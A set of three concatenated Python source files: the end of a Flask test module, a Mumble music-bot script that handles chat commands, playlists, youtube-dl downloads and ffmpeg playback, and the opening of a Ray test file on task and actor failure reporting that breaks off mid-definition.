assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = "running on %s:%s ..." % (hostname, port)
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == "running on %s:%s ..." % (hostname, port)
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(monkeypatch, host, port, server_name, expect_host, expect_port, app):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
|
mumbleBot.py
|
#!/usr/bin/env python3
import threading
import time
import sys
import signal
import configparser
import audioop
import subprocess as sp
import argparse
import os.path
import pymumble.pymumble_py3 as pymumble
import interface
import variables as var
import hashlib
import youtube_dl
import logging
import util
import base64
from PIL import Image
from io import BytesIO
from mutagen.easyid3 import EasyID3
import re
import media.url
import media.file
import media.playlist
import media.radio
import media.system
class MumbleBot:
def __init__(self, args):
signal.signal(signal.SIGINT, self.ctrl_caught)
self.volume = var.config.getfloat('bot', 'volume')
        if var.db.has_option('bot', 'volume'):
self.volume = var.db.getfloat('bot', 'volume')
FORMAT = '%(asctime)s: %(message)s'
if args.verbose:
logging.basicConfig(format=FORMAT, level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S')
logging.debug("Starting in DEBUG loglevel")
elif args.quiet:
logging.basicConfig(format=FORMAT, level=logging.ERROR, datefmt='%Y-%m-%d %H:%M:%S')
logging.error("Starting in ERROR loglevel")
else:
logging.basicConfig(format=FORMAT, level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
logging.info("Starting in INFO loglevel")
var.playlist = []
var.user = args.user
var.music_folder = var.config.get('bot', 'music_folder')
var.is_proxified = var.config.getboolean("webinterface", "is_web_proxified")
self.exit = False
self.nb_exit = 0
self.thread = None
self.is_playing = False
if var.config.getboolean("webinterface", "enabled"):
wi_addr = var.config.get("webinterface", "listening_addr")
wi_port = var.config.getint("webinterface", "listening_port")
interface.init_proxy()
tt = threading.Thread(target=start_web_interface, args=(wi_addr, wi_port))
tt.daemon = True
tt.start()
if args.host:
host = args.host
else:
host = var.config.get("server", "host")
if args.port:
port = args.port
else:
port = var.config.getint("server", "port")
if args.password:
password = args.password
else:
password = var.config.get("server", "password")
if args.channel:
channel = args.channel
else:
channel = var.config.get("server", "channel")
self.channel = channel.strip()
if args.user:
self.username = args.user
else:
self.username = var.config.get("bot", "username")
self.mumble = pymumble.Mumble(host, user=self.username, port=port, password=password,
debug=var.config.getboolean('debug', 'mumbleConnection'), certfile=args.certificate)
self.mumble.callbacks.set_callback("text_received", self.message_received)
self.mumble.set_codec_profile("audio")
self.mumble.start() # start the mumble thread
self.mumble.is_ready() # wait for the connection
self.set_comment()
        self.mumble.users.myself.unmute()  # make sure the user is not muted
if self.channel:
self.mumble.channels.find_by_name(self.channel).move_in()
self.mumble.set_bandwidth(200000)
self.loop()
def ctrl_caught(self, signal, frame):
logging.info("\nSIGINT caught, quitting, {} more to kill".format(2 - self.nb_exit))
self.exit = True
self.stop()
if self.nb_exit > 1:
logging.info("Forced Quit")
sys.exit(0)
self.nb_exit += 1
def message_received(self, text):
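        # Chat entry point: strip the command symbol, split off the first
        # word as the command, then enforce ban lists and channel/PM
        # permissions before dispatching to the matching handler.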
message = text.message.strip()
user = self.mumble.users[text.actor]['name']
if var.config.getboolean('command', 'split_username_at_space'):
user = user.split()[0]
if message[0] == var.config.get('command', 'command_symbol'):
message = message[1:].split(' ', 1)
if len(message) > 0:
command = message[0]
parameter = ''
if len(message) > 1:
parameter = message[1]
else:
return
logging.info(command + ' - ' + parameter + ' by ' + user)
if command == var.config.get('command', 'joinme'):
self.mumble.users.myself.move_in(self.mumble.users[text.actor]['channel_id'])
return
if not self.is_admin(user) and not var.config.getboolean('bot', 'allow_other_channel_message') and self.mumble.users[text.actor]['channel_id'] != self.mumble.users.myself['channel_id']:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_in_my_channel'))
return
if not self.is_admin(user) and not var.config.getboolean('bot', 'allow_private_message') and text.session:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'pm_not_allowed'))
return
for i in var.db.items("user_ban"):
if user.lower() == i[0]:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'user_ban'))
return
if command == var.config.get('command', 'user_ban'):
if self.is_admin(user):
if parameter:
self.mumble.users[text.actor].send_message(util.user_ban(parameter))
else:
self.mumble.users[text.actor].send_message(util.get_user_ban())
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
return
elif command == var.config.get('command', 'user_unban'):
if self.is_admin(user):
if parameter:
self.mumble.users[text.actor].send_message(util.user_unban(parameter))
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
return
elif command == var.config.get('command', 'url_ban'):
if self.is_admin(user):
if parameter:
self.mumble.users[text.actor].send_message(util.url_ban(self.get_url_from_input(parameter)))
else:
self.mumble.users[text.actor].send_message(util.get_url_ban())
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
return
elif command == var.config.get('command', 'url_unban'):
if self.is_admin(user):
if parameter:
self.mumble.users[text.actor].send_message(util.url_unban(self.get_url_from_input(parameter)))
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
return
if parameter:
for i in var.db.items("url_ban"):
if self.get_url_from_input(parameter.lower()) == i[0]:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'url_ban'))
return
if command == var.config.get('command', 'play_file') and parameter:
music_folder = var.config.get('bot', 'music_folder')
# sanitize "../" and so on
path = os.path.abspath(os.path.join(music_folder, parameter))
if path.startswith(music_folder):
if os.path.isfile(path):
filename = path.replace(music_folder, '')
music = {'type': 'file',
'path': filename,
'user': user}
var.playlist.append(music)
else:
# try to do a partial match
matches = [file for file in util.get_recursive_filelist_sorted(music_folder) if parameter.lower() in file.lower()]
if len(matches) == 0:
self.send_msg(var.config.get('strings', 'no_file'), text)
elif len(matches) == 1:
music = {'type': 'file',
'path': matches[0],
'user': user}
var.playlist.append(music)
else:
messages = var.config.get('strings', 'multiple_matches') + '<br />'
messages += '<br />'.join(matches)
self.send_msg(messages, text)
else:
self.send_msg(var.config.get('strings', 'bad_file'), text)
self.async_download_next()
elif command in [var.config.get('command', 'play_url'),
var.config.get('command', 'play_search')] and parameter:
if command == var.config.get('command', 'play_search'):
parameter = media.url.search_youtube_url(parameter)
if not parameter:
self.send_msg(var.config.get('strings', 'unable_download'), text)
return
music = {'type': 'url',
'url': self.get_url_from_input(parameter),
'user': user,
'ready': 'validation'}
var.playlist.append(music)
if media.url.get_url_info():
if var.playlist[-1]['duration'] > var.config.getint('bot', 'max_track_duration'):
var.playlist.pop()
self.send_msg(var.config.get('strings', 'too_long'), text)
else:
for i in var.db.options("url_ban"):
                        logging.debug("%s -> %s" % (i, var.playlist[-1]["url"]))
if var.playlist[-1]['url'] == i:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'url_ban'))
var.playlist.pop()
return
var.playlist[-1]['ready'] = "no"
self.async_download_next()
else:
var.playlist.pop()
self.send_msg(var.config.get('strings', 'unable_download'), text)
elif command == var.config.get('command', 'play_playlist') and parameter:
offset = 0
try:
offset = int(parameter.split(" ")[-1])
except ValueError:
pass
if media.playlist.get_playlist_info(url=self.get_url_from_input(parameter), start_index=offset, user=user):
self.async_download_next()
elif command == var.config.get('command', 'play_autoplay') and parameter:
parameter = media.url.search_youtube_url(parameter)
music = {'type': 'url',
'url': self.get_url_from_input(parameter),
'user': user,
'ready': 'validation'}
var.playlist.append(music)
for i in range(var.config.getint('bot', 'max_track_playlist')):
if media.url.get_url_info():
if var.playlist[-1]['duration'] > var.config.getint('bot', 'max_track_duration'):
var.playlist.pop()
self.send_msg(var.config.get('strings', 'too_long'), text)
else:
for i in var.db.options("url_ban"):
                            logging.debug("%s -> %s" % (i, var.playlist[-1]["url"]))
if var.playlist[-1]['url'] == i:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'url_ban'))
var.playlist.pop()
return
var.playlist[-1]['ready'] = "no"
self.async_download_next()
parameter = media.url.get_youtube_recommendation(parameter)
music = {'type': 'url',
'url': self.get_url_from_input(parameter),
'user': user,
'ready': 'validation'}
var.playlist.append(music)
else:
var.playlist.pop()
self.send_msg(var.config.get('strings', 'unable_download'), text)
elif command == var.config.get('command', 'play_radio') and parameter:
if var.config.has_option('radio', parameter):
parameter = var.config.get('radio', parameter)
music = {'type': 'radio',
'url': self.get_url_from_input(parameter),
'user': user}
var.playlist.append(music)
self.async_download_next()
elif command == var.config.get('command', 'help'):
self.send_msg(var.config.get('strings', 'help'), text)
elif command == var.config.get('command', 'stop'):
self.stop()
elif command == var.config.get('command', 'kill'):
if self.is_admin(user):
self.stop()
self.exit = True
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
elif command == var.config.get('command', 'update'):
if self.is_admin(user):
self.mumble.users[text.actor].send_message("Starting the update")
tp = sp.check_output([var.config.get('bot', 'pip3_path'), 'install', '--upgrade', 'youtube-dl']).decode()
messages = []
need_restart = False
if "Requirement already up-to-date" in tp:
messages.append("Youtube-dl is up-to-date")
else:
messages.append("Update done : " + tp.split('Successfully installed')[1])
if 'up to date' in sp.check_output(['/usr/bin/git', 'pull']).decode():
messages.append("I'm up-to-date")
else:
messages.append("Updated source code, restarting..")
need_restart = True
self.mumble.users[text.actor].send_message('<br>'.join(messages))
if need_restart:
sp.check_output([var.config.get('bot', 'pip3_path'), 'install', '-r', 'requirements.txt']).decode()
os.execv(sys.executable, ['python'] + sys.argv)
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
elif command == var.config.get('command', 'stop_and_getout'):
self.stop()
if self.channel:
self.mumble.channels.find_by_name(self.channel).move_in()
elif command == var.config.get('command', 'volume'):
if parameter is not None and parameter.isdigit() and 0 <= int(parameter) <= 100:
self.volume = float(float(parameter) / 100)
self.send_msg(var.config.get('strings', 'change_volume') % (
int(self.volume * 100), self.mumble.users[text.actor]['name']), text)
var.db.set('bot', 'volume', str(self.volume))
else:
self.send_msg(var.config.get('strings', 'current_volume') % int(self.volume * 100), text)
elif command == var.config.get('command', 'current_music'):
if len(var.playlist) > 0:
source = var.playlist[0]["type"]
if source == "radio":
reply = "[radio] {title} on {url} by {user}".format(
title=media.radio.get_radio_title(var.playlist[0]["url"]),
url=var.playlist[0]["title"],
user=var.playlist[0]["user"]
)
elif source == "url" and 'from_playlist' in var.playlist[0]:
reply = "[playlist] {title} (from the playlist <a href=\"{url}\">{playlist}</a> by {user}".format(
title=var.playlist[0]["title"],
url=var.playlist[0]["playlist_url"],
playlist=var.playlist[0]["playlist_title"],
user=var.playlist[0]["user"]
)
elif source == "url":
reply = "[url] {title} (<a href=\"{url}\">{url}</a>) by {user}".format(
title=var.playlist[0]["title"],
url=var.playlist[0]["url"],
user=var.playlist[0]["user"]
)
elif source == "file":
reply = "[file] {title} by {user}".format(
title=var.playlist[0]["title"],
user=var.playlist[0]["user"])
else:
reply = "ERROR"
logging.error(var.playlist)
else:
reply = var.config.get('strings', 'not_playing')
self.send_msg(reply, text)
elif command == var.config.get('command', 'skip'):
if parameter == '':
parameter = 0
elif parameter.isdigit():
parameter = int(parameter)
else:
self.send_msg(var.config.get('strings', 'no_possible'), text)
return
if len(var.playlist) > 0:
removed = var.playlist.pop(parameter)
                removed = removed.get('title', removed.get('url', removed.get('path', '')))
self.send_msg(var.config.get('strings', 'removing_item') % removed, text)
if len(var.playlist) == 0:
self.stop()
else:
self.launch_music()
self.async_download_next()
if len(var.playlist) == 0:
self.send_msg(var.config.get('strings', 'queue_empty'), text)
elif command == var.config.get('command', 'list'):
folder_path = var.config.get('bot', 'music_folder')
files = util.get_recursive_filelist_sorted(folder_path)
if files:
self.send_msg('<br>'.join(files), text)
else:
self.send_msg(var.config.get('strings', 'no_file'), text)
elif command == var.config.get('command', 'queue'):
if len(var.playlist) <= 1:
messages = var.config.get('strings', 'queue_empty')
else:
messages = var.config.get('strings', 'queue_contents') + '<br />'
i = 1
for value in var.playlist[1:]:
messages += '[{}] ({}) {}<br />'.format(i, value['type'], value['title'] if 'title' in value else value['url'])
i += 1
self.send_msg(messages, text)
elif command == var.config.get('command', 'repeat'):
var.playlist.append(var.playlist[0])
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'bad_command'))
@staticmethod
def is_admin(user):
list_admin = var.config.get('bot', 'admin').split(';')
if user in list_admin:
return True
else:
return False
@staticmethod
def next():
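        # Advance the queue: drop the finished track and report whether
        # another entry remains to be played.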
logging.debug("Next into the queue")
if len(var.playlist) > 1:
var.playlist.pop(0)
return True
elif len(var.playlist) == 1:
var.playlist.pop(0)
return False
else:
return False
def launch_music(self):
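        # Resolve the head of the playlist to a playable URI, optionally
        # announce it in chat (with an inline base64 thumbnail), then spawn
        # ffmpeg to emit raw 48 kHz mono s16le PCM on stdout.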
uri = ""
logging.debug("launch_music asked" + str(var.playlist[0]))
if var.playlist[0]["type"] == "url":
media.system.clear_tmp_folder(var.config.get('bot', 'tmp_folder'), var.config.getint('bot', 'tmp_folder_max_size'))
if var.playlist[0]["ready"] == "downloading":
return
elif var.playlist[0]["ready"] != "yes":
logging.info("Current music wasn't ready, Downloading...")
self.download_music(index=0)
uri = var.playlist[0]['path']
if os.path.isfile(uri):
audio = EasyID3(uri)
title = ""
if audio["title"]:
title = audio["title"][0]
path_thumbnail = var.playlist[0]['path'][:-4] + '.jpg' # Remove .mp3 and add .jpg
thumbnail_html = ""
if os.path.isfile(path_thumbnail):
im = Image.open(path_thumbnail)
im.thumbnail((100, 100), Image.ANTIALIAS)
buffer = BytesIO()
im.save(buffer, format="JPEG")
thumbnail_base64 = base64.b64encode(buffer.getvalue())
                    thumbnail_html = '<img src="data:image/jpeg;base64,' + thumbnail_base64.decode() + '"/>'
                    logging.debug("Thumbnail data " + thumbnail_html)
if var.config.getboolean('bot', 'announce_current_music'):
self.send_msg(var.config.get('strings', 'now_playing') % (title, thumbnail_html))
else:
logging.error("Error with the path during launch_music")
pass
elif var.playlist[0]["type"] == "file":
uri = var.config.get('bot', 'music_folder') + var.playlist[0]["path"]
elif var.playlist[0]["type"] == "radio":
uri = var.playlist[0]["url"]
title = media.radio.get_radio_server_description(uri)
var.playlist[0]["title"] = title
if var.config.getboolean('debug', 'ffmpeg'):
ffmpeg_debug = "debug"
else:
ffmpeg_debug = "warning"
command = ["ffmpeg", '-v', ffmpeg_debug, '-nostdin', '-i', uri, '-filter:a', 'loudnorm', '-ac', '1', '-f', 's16le', '-ar', '48000', '-']
logging.info("FFmpeg command : " + " ".join(command))
self.thread = sp.Popen(command, stdout=sp.PIPE, bufsize=480)
self.is_playing = True
def download_music(self, index):
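        # Small state machine on playlist[index]['ready']:
        # 'validation' -> 'no' -> 'downloading' -> 'yes'; tracks that are too
        # long or that fail metadata validation are dropped from the queue here.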
if var.playlist[index]['type'] == 'url' and var.playlist[index]['ready'] == "validation":
if media.url.get_url_info(index=index):
                if var.playlist[index]['duration'] > var.config.getint('bot', 'max_track_duration'):
                    logging.info("the music " + var.playlist[index]["url"] + " has a duration of " + str(var.playlist[index]['duration']) + "s -- too long")
                    var.playlist.pop(index)
                    self.send_msg(var.config.get('strings', 'too_long'))
                    return
else:
var.playlist[index]['ready'] = "no"
else:
var.playlist.pop(index)
logging.error("Error while fetching info from the URL")
self.send_msg(var.config.get('strings', 'unable_download'))
if var.playlist[index]['type'] == 'url' and var.playlist[index]['ready'] == "no":
var.playlist[index]['ready'] = "downloading"
logging.debug("Download index:" + str(index))
logging.debug(var.playlist[index])
url = var.playlist[index]['url']
url_hash = hashlib.md5(url.encode()).hexdigest()
path = var.config.get('bot', 'tmp_folder') + url_hash + ".%(ext)s"
mp3 = path.replace(".%(ext)s", ".mp3")
var.playlist[index]['path'] = mp3
# if os.path.isfile(mp3):
# audio = EasyID3(mp3)
# var.playlist[index]['title'] = audio["title"][0]
ydl_opts = ""
ydl_opts = {
'format': 'bestaudio/best',
'outtmpl': path,
'noplaylist': True,
'writethumbnail': True,
'updatetime': False,
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192'},
{'key': 'FFmpegMetadata'}]
}
self.send_msg(var.config.get('strings', "download_in_progress") % var.playlist[index]['title'])
logging.info("Information before start downloading :" + str(var.playlist[index]))
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
for i in range(2):
try:
ydl.extract_info(url)
if 'ready' in var.playlist[index] and var.playlist[index]['ready'] == "downloading":
var.playlist[index]['ready'] = "yes"
except youtube_dl.utils.DownloadError:
pass
else:
break
return
def async_download_next(self):
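        # Pre-fetch the next URL track in a daemon thread so the download
        # does not interrupt playback of the current one.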
logging.info("Async download next asked")
if len(var.playlist) > 1 and var.playlist[1]['type'] == 'url' and var.playlist[1]['ready'] in ["no", "validation"]:
th = threading.Thread(target=self.download_music, kwargs={'index': 1})
else:
return
logging.info("Start downloading next in thread")
th.daemon = True
th.start()
@staticmethod
def get_url_from_input(string):
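        # Mumble rich-text messages wrap links in HTML, so fall back to
        # extracting the href attribute when the string is not a bare URL.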
if string.startswith('http'):
return string
p = re.compile('href="(.+?)"', re.IGNORECASE)
res = re.search(p, string)
if res:
return res.group(1)
else:
return False
def loop(self):
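        # Main playback loop: keep pymumble's output buffer topped up with
        # 480-byte PCM chunks (5 ms of 48 kHz mono 16-bit audio), scaled by
        # the current volume via audioop.mul; when ffmpeg's stdout dries up,
        # advance to the next playlist entry.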
raw_music = ""
        while not self.exit and self.mumble.is_alive():
while self.mumble.sound_output.get_buffer_size() > 0.5 and not self.exit:
time.sleep(0.01)
if self.thread:
raw_music = self.thread.stdout.read(480)
if raw_music:
self.mumble.sound_output.add_sound(audioop.mul(raw_music, 2, self.volume))
else:
time.sleep(0.1)
else:
time.sleep(0.1)
if self.thread is None or not raw_music:
if self.is_playing:
self.is_playing = False
self.next()
if len(var.playlist) > 0:
if var.playlist[0]['type'] in ['radio', 'file'] \
or (var.playlist[0]['type'] == 'url' and var.playlist[0]['ready'] not in ['validation', 'downloading']):
self.launch_music()
self.async_download_next()
while self.mumble.sound_output.get_buffer_size() > 0:
time.sleep(0.01)
time.sleep(0.5)
if self.exit:
util.write_db()
def stop(self):
if self.thread:
self.thread.kill()
self.thread = None
var.playlist = []
self.is_playing = False
def set_comment(self):
self.mumble.users.myself.comment(var.config.get('bot', 'comment'))
def send_msg(self, msg, text=None):
if not text or not text.session:
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
own_channel.send_text_message(msg)
else:
self.mumble.users[text.actor].send_message(msg)
def start_web_interface(addr, port):
logging.info('Starting web interface on {}:{}'.format(addr, port))
interface.web.run(port=port, host=addr)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Bot for playing music on Mumble')
# General arguments
parser.add_argument("--config", dest='config', type=str, default='configuration.ini', help='Load configuration from this file. Default: configuration.ini')
parser.add_argument("--db", dest='db', type=str, default='db.ini', help='database file. Default db.ini')
parser.add_argument("-q", "--quiet", dest="quiet", action="store_true", help="Only Error logs")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", help="Show debug log")
# Mumble arguments
parser.add_argument("-s", "--server", dest="host", type=str, help="Hostname of the Mumble server")
parser.add_argument("-u", "--user", dest="user", type=str, help="Username for the bot")
parser.add_argument("-P", "--password", dest="password", type=str, help="Server password, if required")
parser.add_argument("-p", "--port", dest="port", type=int, help="Port for the Mumble server")
parser.add_argument("-c", "--channel", dest="channel", type=str, help="Default channel for the bot")
parser.add_argument("-C", "--cert", dest="certificate", type=str, default=None, help="Certificate file")
args = parser.parse_args()
var.dbfile = args.db
config = configparser.ConfigParser(interpolation=None, allow_no_value=True)
parsed_configs = config.read(['configuration.default.ini', args.config], encoding='latin-1')
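    # The db parser uses an exotic delimiter ('²'), presumably so stored
    # values may themselves contain '=' and ':' (URLs, titles) without
    # being split.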
db = configparser.ConfigParser(interpolation=None, allow_no_value=True, delimiters='²')
db.read(var.dbfile, encoding='latin-1')
if len(parsed_configs) == 0:
        logging.error('Could not read configuration from file "{}"'.format(args.config))
sys.exit()
var.config = config
var.db = db
botamusique = MumbleBot(args)
|
test_failure.py
|
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
from ray.experimental.internal_kv import _internal_kv_get
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (wait_for_condition, SignalActor, init_error_pubsub,
get_error_message, Semaphore)
def test_unhandled_errors(ray_start_regular):
@ray.remote
def f():
raise ValueError()
@ray.remote
class Actor:
def f(self):
raise ValueError()
a = Actor.remote()
num_exceptions = 0
def interceptor(e):
nonlocal num_exceptions
num_exceptions += 1
# Test we report unhandled exceptions.
ray.worker._unhandled_error_handler = interceptor
x1 = f.remote()
x2 = a.f.remote()
del x1
del x2
wait_for_condition(lambda: num_exceptions == 2)
# Test we don't report handled exceptions.
x1 = f.remote()
x2 = a.f.remote()
with pytest.raises(ray.exceptions.RayError) as err: # noqa
ray.get([x1, x2])
del x1
del x2
time.sleep(1)
assert num_exceptions == 2, num_exceptions
# Test suppression with env var works.
try:
os.environ["RAY_IGNORE_UNHANDLED_ERRORS"] = "1"
x1 = f.remote()
del x1
time.sleep(1)
assert num_exceptions == 2, num_exceptions
finally:
del os.environ["RAY_IGNORE_UNHANDLED_ERRORS"]
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
